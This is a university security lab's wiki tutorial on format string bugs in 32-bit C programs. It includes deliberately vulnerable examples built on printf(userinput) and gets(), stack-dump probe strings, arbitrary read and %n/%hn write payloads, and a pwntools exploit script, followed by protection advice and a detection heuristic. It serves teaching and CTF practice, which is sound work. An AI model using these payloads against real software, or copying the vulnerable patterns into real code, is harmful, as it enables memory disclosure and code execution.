Difference between revisions of "Format String Bug Introduction"

From Embedded Lab Vienna for IoT & Security
Latest revision as of 14:33, 19 May 2020

Summary

This document gives an introduction to format string bugs. A Format String Bug occurs when the programmer passes a user-controlled buffer as the Format String of a Format Function. The Format Function then interprets any format specifiers in the user input as instructions. An exploit can read from the stack and write to arbitrary locations, and therefore change the program behavior. This can lead to program crashes (segmentation faults) and to security compromise, such as the disclosure of secrets in memory (information disclosure) or the execution of arbitrary commands.


Requirements

Binaries are tested on platform: Debian 4.9.210-1 (2020-01-20)

 git clone https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ccst
 cd ccst/format_string

All code examples discussed here can be found in the example folder. They are compiled for the 32-bit x86 architecture using gcc version 6.3.0 (posix).

 gcc example.c -m32 -o example

Exploits for the x64 architecture may differ.

Description of Format String Vulnerability

The Format Function is an ANSI C conversion function, such as printf, which converts a variable into a human-readable string representation. The Format String is the argument of the Format Function; it contains an ASCII string with text and Format Parameters, such as:

 printf("Guess solution: %d\n", 42);

Here 42 is interpreted as a decimal number by the Format Function. The Format Parameter/Specifier (%d, %s, %p, %u, ...) defines the type of conversion.

Format Parameter/Specifier Table

 Parameter   Output                                            Passed as
 %p          External representation of a pointer to void      Reference
 %d          Decimal                                           Value
 %c          Character                                         Value
 %u          Unsigned decimal                                  Value
 %x          Hexadecimal                                       Value
 %s          String                                            Reference
 %n          Writes the number of characters into a pointer    Reference

In vulnerable code, the user input is passed directly to the function as printf(userinput), instead of being passed as an argument to a fixed Format String that contains a Format Parameter.

Vulnerable Format Functions Table

 Format function   Description
 fprintf           Writes the formatted output to a file
 printf            Outputs a formatted string
 sprintf           Prints into a string
 snprintf          Prints into a string, checking the length
 vfprintf          Prints a va_arg structure to a file
 vprintf           Prints a va_arg structure to stdout
 vsprintf          Prints a va_arg structure to a string
 vsnprintf         Prints a va_arg structure to a string, checking the length

History

The Format String Bug has been publicly known since at least September 1999[1]; it gained major attention after the public release of exploit code against wu-ftpd 2.6.0 in June 2000[2].

Read From the Stack

Example - Read from the stack

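The following program shows safe and vulnerable usage of a Format Function:


   #include <stdio.h>
   int main(int argc, char **argv)
   {
       if (argc < 2)
           return 1;

       // This line is safe: the input is only an argument to a fixed Format String
       printf("%s\n", argv[1]);

       // This line is vulnerable: the input itself is used as the Format String
       printf(argv[1]);
       return 0;
   }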


Execute with different arguments:

   ./example "%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p"
   ./example "%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"
   ./example "%s"

In the first call, the Format Function interprets the command line argument as a Format String with 15 pointer parameters. Because no corresponding arguments were passed, it prints the next 15 values from the stack, which means we are able to dump the stack. With %s, the next stack value is dereferenced as a string pointer, which may crash the program if that value is not a valid address.

What happens exactly?

  • Stack with correctly coded Format String

   printf("this is a %s, with a number %d, and address %08x", a, b, &c);

The stack grows towards lower addresses and is used in a LIFO manner; the arguments are pushed onto the stack in reverse order. The Format Function reads a, b and &c from the stack and converts them into the string that is sent to stdout. (Source of image: [3])

Safe.png

  • Stack with missing variables

printf(userinput) with the input string "this is a %s, with a number %d, and address %08x" evaluates to

   printf("this is a %s, with a number %d, and address %08x");

The variables a, b and &c are missing on the stack. (Source of image: [3])

Vulnstack.png

The Format Function reads the next values from the stack even though they were never passed as arguments.

If the source code is available, a Format String vulnerability can be recognized by checking, for every Format Function call, whether a Format String with Format Specifiers is provided correctly. If only a binary is available, test it by simply inserting Format Specifiers such as "%x %x %s" as input.
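The behavior described above can be imitated with a toy model. The following Python sketch is not how printf is implemented; the function name toy_printf and the stack contents are invented for illustration. It treats the stack as a list of 32-bit words and consumes one word per %x or %d, whether or not the caller supplied an argument for it.

```python
import re

def toy_printf(fmt, stack):
    """Toy model: consume one stack word per specifier, supplied or not."""
    words = iter(stack)

    def convert(match):
        word = next(words)  # taken from the stack even if no argument was passed
        if match.group(1) == "x":
            return "%08x" % word
        return str(word)

    return re.sub(r"%(x|d)", convert, fmt)

# Hypothetical stack contents: two real arguments followed by unrelated data.
stack = [42, 0x1337, 0xdeadbeef, 0xcafebabe]

# Correct call: two specifiers, two arguments.
safe = toy_printf("%d %x", stack)
# Attacker-controlled Format String: the extra specifiers leak the next words.
leak = toy_printf("%x.%x.%x.%x", stack)
print(safe)
print(leak)
```

In the second call the last two words were never meant to be printed, which is the information disclosure the figures illustrate.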

Read by Direct Stack Parameter Access

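File example2.c

   #include <stdio.h>
   #include <string.h>
   
   void vuln() {
       printf("What's your name? ");
       char name[200];
       gets(name);                    // intentionally unsafe: no length check
       printf("Nice to meet you, ");
       printf(strcat(name, "!\n"));   // vulnerable: user input is the Format String
   }
   
   int main(int argc, char **argv)
   {
       // disable buffering so that prompts and output appear immediately
       setvbuf(stdin, NULL, _IONBF, 0);
       setvbuf(stdout, NULL, _IONBF, 0);
       vuln();
       return 0;
   }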

We can read an arbitrary parameter from the stack directly with "%<some number>$x": to read the first parameter on the stack we use %1$08x, for the second %2$08x, and so on. To find out where we are reading, we can insert a recognizable marker followed by a series of specifiers:

   "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"
   
   ./example2
   What's your name? AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
   Nice to meet you,   
   AAAA.5655f000.00000001.5655d64d.ffd4fbb8.f77595f0.f75bf00b.41414141.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78!

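From this output we can determine the position of the input buffer on the stack by locating 41414141. The position depends on the binary and its stack layout, so it must be counted on the actual target: in the output above 41414141 is the 7th value, while in the run below the buffer starts at the 6th value. The remaining examples assume that the input buffer name is the 6th parameter on the stack, which can be accessed by AAAA.%6$08x.

Caution - data on the stack is represented in little endian on x86 machines. Test this by inserting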

   ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
   
   ./example2
   What's your name? ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
   Nice to meet you, ABCD.f18281a0.0000004f.ffffffaf.85571440.00000012.44434241.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838!

The Format String with our input ABCD... can be found on the stack beginning with the 6th parameter, 44434241 in little endian, which can be verified by ABCD.%6$08x.
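Counting the values by hand is error-prone, so the search for the marker can be scripted. The sketch below is only an illustration: the helper names probe and find_offset are assumptions, and the output string is copied from the ABCD run of ./example2 shown above.

```python
import struct

def probe(marker=b"ABCD", count=15):
    """Build a probe string: marker followed by `count` %08x specifiers."""
    return marker + b".%08x" * count

def find_offset(output, marker=b"ABCD"):
    """Return the 1-based index of the stack word that holds the marker."""
    needle = "%08x" % struct.unpack("<I", marker)[0]  # b"ABCD" -> "44434241"
    words = output.rstrip("!").split(".")[1:]         # drop the echoed marker
    return words.index(needle) + 1

# Output copied from the ./example2 run shown above.
seen = ("ABCD.f18281a0.0000004f.ffffffaf.85571440.00000012.44434241."
        "30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830."
        "3830252e.252e7838!")
offset = find_offset(seen)
print(offset, "-> verify with ABCD.%%%d$08x" % offset)
```

The little-endian unpack is what turns the bytes A, B, C, D into the word 44434241 seen in the dump.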

Arbitrary Read

We would like to read data in memory from a known address. The previous examples showed that the content of the Format String on the stack is controlled by us. We therefore need a Format Parameter that takes an address from the stack (passed by reference) and displays the memory at that address: %s. Now we insert the address that we would like to read at the start of the input and make sure that the 6th item on the stack, which holds this address, is consumed by %s and read as a string.

   address = 0x08480110
   address (encoded as 32 bit le string): "\x10\x01\x48\x08"
   printf ("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");
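The input shown above can be assembled programmatically. This is a minimal sketch, assuming the input buffer is the 6th parameter as in the earlier examples; the function name read_payload is hypothetical.

```python
import struct

def read_payload(address, offset=6):
    """Address in little endian, padding specifiers, then %s for `offset`."""
    target = struct.pack("<I", address)         # 0x08480110 -> 10 01 48 08
    pops = b".".join([b"%08x"] * (offset - 1))  # consume the words before it
    return target + b"_" + pops + b"|%s|"

payload = read_payload(0x08480110)
print(payload)

# Shorter variant using direct parameter access instead of five %08x.
direct = struct.pack("<I", 0x08480110) + b"|%6$s|"
print(direct)
```

An address that contains a zero byte would terminate the C string early, so such addresses cannot be placed at the start of the input in this way.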


(With this information you should be able to solve CH0_easyprintf)

Write the Stack

Write with %n

The %n Format Parameter writes the number of bytes already printed into a variable. The address of the variable is given to the Format Function by placing an integer pointer as a parameter onto the stack.

File: example3

   int n_chars = 0;
   printf("Hello, World%n is ", &n_chars);
   printf("%d bytes long.\n",n_chars);

In the first printf call in example3, the %n Format Parameter writes 12, the number of bytes in Hello, World, into the variable n_chars.

%n can be used to write to a specified address:

   "\xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n"


The next printf calls show how the value of n_chars can be controlled by inserting a number of bytes for alignment.

   n_chars = 0;
   printf("%10u%n   ", 1, &n_chars);        //n_chars=10
   n_chars = 0;
   printf("%150u%n   ", 2, &n_chars);        //n_chars=150
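The value stored by %n is simply the length of the output produced so far, which can be checked without running the C code. The sketch below uses Python's own %-formatting, which accepts the same width syntax for these cases; the helper name n_value is an assumption.

```python
def n_value(fmt, *args):
    """Value %n would store: characters produced before it is reached."""
    return len(fmt % args)

hello = n_value("Hello, World")  # text before %n in example3
ten = n_value("%10u", 1)         # field width 10 pads the output to 10 characters
wide = n_value("%150u", 2)       # field width 150 pads the output to 150 characters
print(hello, ten, wide)
```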

However, addresses in memory are 4 bytes long on 32-bit x86, and we do not want to overwrite neighboring areas on the stack. Therefore a technique that writes just one byte at a time is applied several times. Let us have a closer look at what is happening, because writing just one byte may have side effects. An unsigned integer is stored in memory in 4 bytes in little endian encoding, so a number like 0x0000014c is \x4c\x01\x00\x00 in memory.

File: example4

   unsigned char   canary[5];
   unsigned char   foo[4];
   memset (foo, 0, sizeof (foo));
   /* 0 * before */ strcpy (canary, "AAAA");
   /* 1 */  printf ("%16u%n", 7350, (int *) &foo[0]);            //foo[0]=0x10
   /* 2 */  printf ("%32u%n", 7350, (int *) &foo[1]);            //foo[1]=0x20
   /* 3 */  printf ("%64u%n", 7350, (int *) &foo[2]);            //foo[2]=0x40
   /* 4 */  printf ("%128u%n", 7350, (int *) &foo[3]);           //foo[3]=0x80
   /* 5 * after */ printf ("%02x%02x%02x%02x\n", foo[0], foo[1],foo[2], foo[3]);
   printf ("canary: %02x%02x%02x%02x\n", canary[0],canary[1], canary[2], canary[3]);

In step 0, foo is initialized with four \x00 bytes, and a canary containing AAAA, represented by \x41\x41\x41\x41, is stored in the next variable on the stack. After the four byte-wise write operations, foo contains 10204080 as expected, but 3 bytes of the canary have been overwritten: \x00\x00\x00\x41 = 00000041. Each %n stores a full 4-byte integer, so every write also zeroes the three bytes that follow its target byte. The next figure illustrates this behavior of the write procedures. (Image source: [4])

Write.png
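The overlapping writes can be replayed on a byte array. This is a simulation under an assumed memory layout (foo directly followed by canary), not the real stack of example4; the helper name percent_n is hypothetical.

```python
import struct

# Assumed layout: foo[4] directly followed by canary[5] in memory.
memory = bytearray(b"\x00" * 4 + b"AAAA\x00")
FOO, CANARY = 0, 4

def percent_n(offset, count):
    """Model %n: store `count` as a 4-byte little-endian int at `offset`."""
    memory[offset:offset + 4] = struct.pack("<i", count)

# One printf call per byte, as in steps 1 to 4 of example4.
for index, count in enumerate([16, 32, 64, 128]):
    percent_n(FOO + index, count)

foo_hex = memory[FOO:FOO + 4].hex()
canary_hex = memory[CANARY:CANARY + 4].hex()
print(foo_hex, canary_hex)
```

The last write starts at foo[3] and therefore spills three zero bytes into the canary, leaving only its fourth byte intact.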

Multiple bytes can also be written in a single call when the byte values to be written are in ascending order, because the character count only increases within one call.

File: example4

   strcpy (canary, "AAAA");
   printf ("%16u%n%16u%n%32u%n%64u%n",1, (int *) &foo[0], 1, (int *) &foo[1],1, (int *) &foo[2], 1, (int *) &foo[3]);
   printf ("%02x%02x%02x%02x\n", foo[0], foo[1],foo[2], foo[3]);
   printf ("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]);

Output again foo: 10204080 and canary: 00000041.
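Within one call the character count is cumulative, so each field width is the difference to the previous target value. The sketch below computes these widths; the function name byte_widths is an assumption. The modulo step goes beyond example4: only the lowest byte of the count ends up in the target byte, so wrapping past 256 would also reach values that are not in ascending order.

```python
def byte_widths(target_bytes, already_printed=0):
    """Field widths so the running count's low byte hits each target in turn."""
    widths = []
    count = already_printed
    for wanted in target_bytes:
        pad = (wanted - count) % 256
        if pad < 10:  # %u may need up to 10 decimal digits for a 32-bit value
            pad += 256
        widths.append(pad)
        count += pad
    return widths

widths = byte_widths([0x10, 0x20, 0x40, 0x80])
fmt = "".join("%%%du%%n" % w for w in widths)
print(widths, fmt)
```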

Write Short %hn

Instead of writing each byte separately, we can write short integers using the %hn format specifier. The advantage of %hn is that it does not destroy data near the targeted address. Therefore this is the preferred method. Again we would like to write 10204080 into foo.

First value of alignment: 0x2010 = 8208
Second value of alignment: 0x8040 - 0x2010 = 32832 - 8208 = 24624

Source: example5

   printf ("%.8208u%hn%.24624u%hn",1, (short int *) &foo[0], 1, (short int *) &foo[2]);

Output: foo: 10204080 canary: 41414141

Writing short values enables exploitation of the Format String Bug without overwriting nearby memory locations.

To overwrite a 4-byte address we need just two write steps; take care to pass the parameters in the correct order.
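The two alignment values follow from reading the target bytes as two little-endian shorts. A minimal sketch of that arithmetic, with variable names chosen only for illustration:

```python
import struct

target = bytes([0x10, 0x20, 0x40, 0x80])  # desired content of foo[0..3]
low, high = struct.unpack("<HH", target)  # shorts at &foo[0] and &foo[2]

first_pad = low           # characters printed before the first %hn
second_pad = high - low   # additional characters before the second %hn
fmt = "%%.%du%%hn%%.%du%%hn" % (first_pad, second_pad)
print(hex(low), hex(high), first_pad, second_pad, fmt)
```

Because of the little-endian byte order, the bytes 10 20 form the short 0x2010, not 0x1020.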

Write Short Example: Given a binary vuln with a Format String vulnerability, we would like to overwrite a variable test on the stack, whose address test_addr=0xffeeecac is known, and set it to test=0x1337babe. The input buffer used in the printf function is the 6th element on the stack. A Python script that builds the exploitation string p32(addr)+p32(addr+2)+'%'+str(first)+'x%6$hn'+'%'+str(second)+'x%7$hn' looks like

   from pwn import *
   p = process('./vuln')
   
   test_addr = 0xffeeecac
   # low half is written to test_addr, high half to test_addr+2 (little endian)
   payload = b''
   payload += p32(test_addr)
   payload += p32(test_addr + 2)
   # pad the output to 0xbabe characters, then write the low half
   first = 0xbabe - len(payload)
   payload += b'%' + str(first).encode() + b'x%6$hn'
   # 0x1337 is smaller than 0xbabe, so the 16-bit count has to wrap around
   second = (0x1337 - 0xbabe) % 0x10000
   payload += b'%' + str(second).encode() + b'x%7$hn'
   p.sendline(payload)
   p.interactive()
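The padding arithmetic can be checked without pwntools or a target binary. The following sketch builds the same kind of payload with the standard struct module; the function name hn_payload is hypothetical, and it assumes that the two addresses at the start of the input are parameters offset and offset+1.

```python
import struct

def hn_payload(address, value, offset):
    """Two %hn writes: low half to `address`, high half to `address + 2`."""
    payload = struct.pack("<II", address, address + 2)
    printed = len(payload)
    halves = [value & 0xffff, value >> 16]
    for index, half in enumerate(halves):
        pad = (half - printed) % 0x10000  # the 16-bit count wraps around
        if pad < 8:                       # %x may print up to 8 hex digits
            pad += 0x10000
        payload += b"%%%dx%%%d$hn" % (pad, offset + index)
        printed += pad
    return payload

payload = hn_payload(0xffeeecac, 0x1337babe, 6)
print(payload)
```

Taking the difference modulo 0x10000 handles the case where the second half is smaller than the first, because %hn stores only the lowest 16 bits of the count.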

(Now you should be able to solve the challenge CH1_root_me2 and CH2_printfun)


Usage

  • Reading arbitrary locations (leak addresses or canaries)
  • Writing arbitrary locations
  • Executing arbitrary code (overwriting return addresses or .GOT entries)


Protection

  • Programmers should use the safe variants

Never pass user input directly to a Format Function without a format specifier.[5]

    printf("%s", userinputbuffer);
    snprintf(buf, sizeof buf, "%s", userinputbuffer);

  • FormatGuard: Automatic Protection From printf Format String Vulnerabilities [6]
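Checking every Format Function call in source code can be partly automated. The sketch below is a rough heuristic and not a replacement for compiler warnings or a real parser: it flags calls whose format argument is not a string literal. The names FORMAT_ARG, split_args and suspicious_calls are invented for this example, and only four of the functions from the table are covered.

```python
import re

# Index of the Format String argument for each function (0-based).
FORMAT_ARG = {"printf": 0, "fprintf": 1, "sprintf": 1, "snprintf": 2}
CALL = re.compile(r"\b(printf|fprintf|sprintf|snprintf)\s*\(([^;]*)\)\s*;")

def split_args(text):
    """Split on top-level commas, ignoring commas inside quotes or brackets."""
    args, depth, quoted, start = [], 0, False, 0
    for i, ch in enumerate(text):
        if ch == '"' and (i == 0 or text[i - 1] != "\\"):
            quoted = not quoted
        elif not quoted and ch in "([":
            depth += 1
        elif not quoted and ch in ")]":
            depth -= 1
        elif not quoted and depth == 0 and ch == ",":
            args.append(text[start:i].strip())
            start = i + 1
    args.append(text[start:].strip())
    return args

def suspicious_calls(source):
    """Yield calls whose format argument is not a string literal."""
    for match in CALL.finditer(source):
        args = split_args(match.group(2))
        position = FORMAT_ARG[match.group(1)]
        if position < len(args) and not args[position].startswith('"'):
            yield match.group(0)

code = ('printf("%s\\n", argv[1]);\n'
        'printf(argv[1]);\n'
        'snprintf(buf, sizeof buf, "%s", name);')
flagged = list(suspicious_calls(code))
print(flagged)
```

Only the call that passes argv[1] as the Format String is reported; the two calls with a literal "%s" Format String pass the check.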

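Courses

  • Campus Cyber Security Team (05-15-2020)

Sources

  • http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html

Interesting CTF writeups

  • Use format string bug to leak canary and system addresses https://naivenom.tistory.com/19
  • https://github.com/yuvaly0/CTFs/blob/master/2020_tamu/B64DECODER_DONE/B64DECODER.md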

References

  1. Tymm Twillman, Exploit for proftpd 1.2.0pre6, BugTraq, 20-09-1999, https://seclists.org/bugtraq/1999/Sep/328 [accessed 05-21-2020].
  2. tf8, WuFTPD: Providing *remote* root since at least 1994, BugTraq, 22-06-2000, https://seclists.org/bugtraq/2000/Jun/297 [accessed 05-21-2020].
  3. Saif El Sherei, Format String Exploitation-Tutorial, https://www.exploit-db.com/docs/english/28476-linux-format-string-exploitation.pdf [accessed 05-21-2020].
  4. scut / team teso, Exploiting Format String Vulnerabilities, version 1.2, 09-01-2001, http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20Format%20Bugs%20-%20Exploiting%20format%20string.pdf [accessed 05-21-2020].
  5. Michael Howard, David LeBlanc and John Viega, 19 deadly sins of software security programming flaws and how to fix them, Chapter 2, 2005, http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20Format%20String%20Problems.pdf [accessed 05-22-2020].
  6. Crispin Cowan, Matt Barringer, Steve Beattie, Greg Kroah-Hartman, Mike Frantzen and Jamie Lokier, FormatGuard: Automatic Protection From printf Format String Vulnerabilities, Usenix, 2001, https://www.usenix.org/legacy/events/sec01/full_papers/cowanbarringer/cowanbarringer.pdf [accessed 05-21-2020].